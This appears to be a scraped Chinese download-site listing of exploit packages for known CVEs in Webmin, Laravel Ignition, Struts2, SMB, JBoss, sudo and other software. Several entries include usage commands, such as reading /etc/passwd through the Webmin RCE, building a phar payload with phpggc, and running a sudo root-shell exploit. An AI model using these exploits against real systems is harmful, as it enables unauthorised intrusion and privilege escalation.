已经打包成exe可执行文件,可以直接运行,利用版本是WINDOWS10 2004 - 20H2 (需要开启iis服务)
2021-10-27 17:00:29 9.93MB cve
1
ntpscanner NTP monlist 扫描程序 CVE-2013-5211 此代码用于教育和研究目的,请勿用于恶意目的。
2021-10-25 22:45:55 3KB C
1
CVE-2019-15642 Webmin远程执行代码(已认证) python用法: python CVE-2019-15642.py https://xxx.xxx.xxx:10000 "cat /etc/passwd" Webmin的0x01泊坞窗 cd ~/vulhub/webmin/CVE-2019-15107 docker-compose up -d root@9460493fa985:/# passwd root Webmin>用户名= root,密码= root :high_voltage: root@jas502n  ~/vulhub/webmin/CVE-2019-15107   master  docker-compose up -d Creating network "cve-2019-15107_default" with the default driver Pullin
2021-10-24 20:22:49 448KB Python
1
关于解决 Apache_Struts2漏洞(S2-045,CVE-2017-5638),包含说明与所需资源
2021-09-22 16:01:11 4.71MB Struts2漏洞
1
针对CVE-2017-11780的Windows SMB(SMBv1)远程代码执行漏洞, 针对CVE-2017-11771的Windows Search远程代码执行漏洞
2021-09-14 13:48:56 854KB Windows 漏洞
1
laravel漏洞 漏洞利用CVE-2021-3129详细信息: ://www.ambionics.io/blog/laravel-debug-rce 用法 $ php -d ' phar.readonly=0 ' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system id $ ./laravel-ignition-rce.py http://localhost:8000/ /tmp/exploit.phar Log file: /work/pentest/laravel/laravel/storage/logs/laravel.log Logs cleared Successfully converted to PHAR ! Phar deserialized -----------
2021-09-11 10:18:54 3KB Python
1
office最新漏洞,activex控件加载漏洞
2021-09-10 16:00:06 828KB office漏洞 activex html ie
1
jboss漏洞复现,cve-2017-12149漏洞,从环境搭建到复现,自己写的。
2021-09-08 14:50:27 111KB jboss漏
1
已有10年历史,sudo披露严重本地提权漏洞(CVE-2021-3156),普通用户可获得root级权限 渗透测试 安全对抗 APT 安全架构 信息安全研究
CVE-2021-3156 这是基于的仓库修改,并支持任意命令执行。 相关阅读: 用于CVE-2021-3156的根外壳PoC(无暴力破解) 用于教育等 经过测试: @CptGibbon针对sudo 1.8.31的Ubuntu 20.04 @ Rvn0xsy Ubuntu 17.10 所有研究成果: Qualys研究小组在其上查看了详细信息。 您可以使用以下命令检查您的sudo版本是否存在漏洞: $ sudoedit -s Y 如果它询问您的密码,则很容易受到攻击,如果它显示使用信息,则不是。 您可以使用$ sudo apt install sudo=1.8.31-1ubuntu1降级到Ubuntu 20.04上的易受攻击版本以进行测试。 用法 $ make $ ./exploit "Command"
2021-09-05 10:28:23 100KB C
1